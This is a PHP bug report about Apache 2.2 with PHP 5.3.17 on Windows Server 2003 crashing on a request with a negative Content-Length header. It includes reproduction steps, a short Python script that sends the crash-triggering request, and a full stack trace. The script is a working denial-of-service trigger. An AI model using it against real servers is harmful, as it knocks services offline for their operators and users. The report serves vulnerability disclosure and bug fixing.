From: chris at whyley dot com
Operating system: Windows Server 2003
PHP version: 5.3.17
Package: Reproducible crash
Bug Type: Bug
Bug description:Apache 2.2 crashes when PHP called with negative Content-Length
HTTP header
Description:
------------
Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably
crash
by doing the following:
(1) Configure your Apache server to use a custom error handling page for
the HTTP
413 error (Request entity too large) by inserting this line into your
httpd.conf:
ErrorDocument 413 /error/
(2) Run the Python test script detailed below to send an HTTP GET request
to the
server with a negative integer for the HTTP "Content-Length" header and
with the
"Accept-Encoding" header set to "gzip, deflate"
When this is run, Apache crashes with the following error:
[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid
Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with
status
3221225477 -- Restarting.
This issue is a particular problem in the wild where many modern browsers
aren't
capable of handling file uploads over 2GB in size - instead of posting an
accurate filesize for the Content-Length header they use a negative integer
instead, causing the Apache server running PHP to crash. For further
information
on this see http://www.motobit.com/help/scptutl/pa98.htm
The script could be used to perform DOS attacks on vulnerable systems.
Test script:
---------------
#!/usr/bin/python
import socket, sys
target = "10.211.55.3"
port = 80;
request = "GET / HTTP/1.1\n"
request += "Host: "+target+"\n"
request += "Accept-Encoding: gzip, deflate\n"
request += "Content-Length: -1\n\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target, port))
except:
print "[-] Connection to %s:%s failed!" % (target, port)
sys.exit(0)
print "[+] Sending HTTP request. Check for crash on target."
s.send(request)
s.close()
Expected result:
----------------
Stable Apache, no crash.
Actual result:
--------------
Thread 2 - System ID 3008
Entry point msvcrt!_endthreadex+3a
Create time 10/2/2012 2:29:08 PM
Time spent in user mode 0 Days 0:0:0.0
Time spent in kernel mode 0 Days 0:0:0.15
Full Call Stack
Function Arg 1 Arg 2 Arg 3 Arg 4 Source
php5ts!zend_hash_index_find+17 016f3460 0000000d 018ee6c0
00000000 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985
php5ts!_zend_list_delete+27 0000000d 016b0150 029811c0
016b0150
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27
php5ts!_php_stream_free+ae 029811c0 00000003 016b0150
029811c0
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a
php5ts!php_zend_stream_mmap_closer+1a 029811c0 016b0150
0290a4e0
007339f4 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9
php5ts!zend_file_handle_dtor+2a 0290a4e8 016b0150 00000000
00000000 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316
+ 8
php5ts!file_handle_dtor+14 0290a4e8 018ee828 018ee798
00000000
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b
php5ts!zend_llist_del_element+71 016b1754 018ee828 007d9810
016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 +
36
php5ts!zend_destroy_file_handle+26 018ee828 016b0150 016b0150
016b0150
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l @
242
php5ts!zend_execute_scripts+c4 00000002 016b0150 00000000
00000001 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234
php5apache2_2!php_handler+64c 00fba200 006348e0 00fba200
00000000
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @
671 +
13
libhttpd!ap_run_handler+25 00fba200 6eed3de0 00fba200
00634f68
libhttpd!ap_invoke_handler+b0 00000000 00fb8938 018ee8f8
6ff0ef68
libhttpd!ap_internal_redirect+37 00634f68 00fb8938 00eb6c50
0000019d
libhttpd!ap_die+1e8 00fb8938 00000000 00000001 00fba118
libhttpd!ap_http_header_filter+9f 00fb96f8 00fba118 00fba118
018ee974
libhttpd!ap_pass_brigade+52 00fb96f8 00fba118 00000000
00fba118
libhttpd!ap_content_length_filter+a9 00fb96e0 00eb6cb0 00fb96c8
018ee9e0
libhttpd!ap_pass_brigade+52 00fb96e0 00fba118 6fba4309
00fba118
libhttpd!ap_byterange_filter+474 00fb96c8 00fba118 00fba060
018eea1c
libhttpd!ap_pass_brigade+52 00fb96c8 00fba118 00eb6cb0
00fba118
mod_deflate+1352 00fba060 00fba118 00fba0c0 018eea58
libhttpd!ap_pass_brigade+52 00fba060 00fba118 00fba080
00fba190
mod_deflate+1aa1 00fc5a48 00fba1b0 00fba190 018eea84
libhttpd!ap_pass_brigade+52 00fc5a48 00fba190 00fb9938
00fba190
libhttpd!ap_old_write_filter+5b 00fba080 00fba190 00fba190
018eeab4
libhttpd!ap_pass_brigade+52 00fba080 00fba190 00fb9878
00fba138
libhttpd!ap_set_etag+b28 00fba138 00fb9938 0000019d
6ff37324
libhttpd!ap_set_etag+2bb 00fba190 00fb9e08 00000000
00000000
libhttpd!ap_get_brigade+24 00fb9938 00fb9e08 00000000
00000000
php5apache2_2!php_apache_sapi_read_post+3d 018eeb68 00000f9f
00000f9f
016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-
5.3.17\sapi\apache2handler\sapi_apache2.c @ 201 + 1a
php5ts!sapi_deactivate+6f 016b0150 016b0150 00000000
00fb8938
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\sapi.c @ 423 + d
php5ts!php_request_shutdown+3a6 00000000 00000004 00637170
00fb8938 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1670 + 6
php5apache2_2!php_handler+6b1 00fb8938 006348e0 00fb8938
00000000
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @
682
libhttpd!ap_run_handler+25 00fb8938 00fb8938 00fb8938
00000000
libhttpd!ap_invoke_handler+b0 00000000 00fb7958 018eff38
6ff0adbc
libhttpd!ap_die+29e 00fb8938 00000000 006535b0 00fb7958
libhttpd!ap_get_request_note+1d0c 00fb7958 00fb7958 00fb7958
00000001
libhttpd!ap_run_process_connection+25 00fb7958 005c4488
018eff80
6ff1df6c
libhttpd!ap_process_connection+33 00fb7958 00eb49f8 7c911086
00eb0448
libhttpd!ap_regkey_value_remove+c7c 00fb7950 7c911086 7c9101db
00ea2120
msvcrt!_endthreadex+a9 00ea2120 7c911086 7c9101db 00ea2120
kernel32!BaseThreadStart+37 77c3a341 00ea2120 00000000
00000000
Exception Information
PHP5TS!ZEND_HASH_INDEX_FIND+17In
httpd__PID__3560__Date__10_02_2012__Time_02_29_32PM__453__Second_Chance_Exception
_C0000005.dmp the assembly instruction at php5ts!zend_hash_index_find+17 in
C:\Core\PHP-5317\php5ts.dll from The PHP Group has caused an access
violation
exception (0xC0000005) when trying to read from memory location 0x0d3e2d2d
on
thread 2
--
Edit bug report at https://bugs.php.net/bug.php?id=63200&edit=1
--
Try a snapshot (PHP 5.4):
https://bugs.php.net/fix.php?id=63200&r=trysnapshot54
Try a snapshot (PHP 5.3):
https://bugs.php.net/fix.php?id=63200&r=trysnapshot53
Try a snapshot (trunk):
https://bugs.php.net/fix.php?id=63200&r=trysnapshottrunk
Fixed in SVN: https://bugs.php.net/fix.php?id=63200&r=fixed
Fixed in release: https://bugs.php.net/fix.php?id=63200&r=alreadyfixed
Need backtrace: https://bugs.php.net/fix.php?id=63200&r=needtrace
Need Reproduce Script: https://bugs.php.net/fix.php?id=63200&r=needscript
Try newer version: https://bugs.php.net/fix.php?id=63200&r=oldversion
Not developer issue: https://bugs.php.net/fix.php?id=63200&r=support
Expected behavior: https://bugs.php.net/fix.php?id=63200&r=notwrong
Not enough info:
https://bugs.php.net/fix.php?id=63200&r=notenoughinfo
Submitted twice:
https://bugs.php.net/fix.php?id=63200&r=submittedtwice
register_globals: https://bugs.php.net/fix.php?id=63200&r=globals
PHP 4 support discontinued: https://bugs.php.net/fix.php?id=63200&r=php4
Daylight Savings: https://bugs.php.net/fix.php?id=63200&r=dst
IIS Stability: https://bugs.php.net/fix.php?id=63200&r=isapi
Install GNU Sed: https://bugs.php.net/fix.php?id=63200&r=gnused
Floating point limitations: https://bugs.php.net/fix.php?id=63200&r=float
No Zend Extensions: https://bugs.php.net/fix.php?id=63200&r=nozend
MySQL Configuration Error: https://bugs.php.net/fix.php?id=63200&r=mysqlcfg
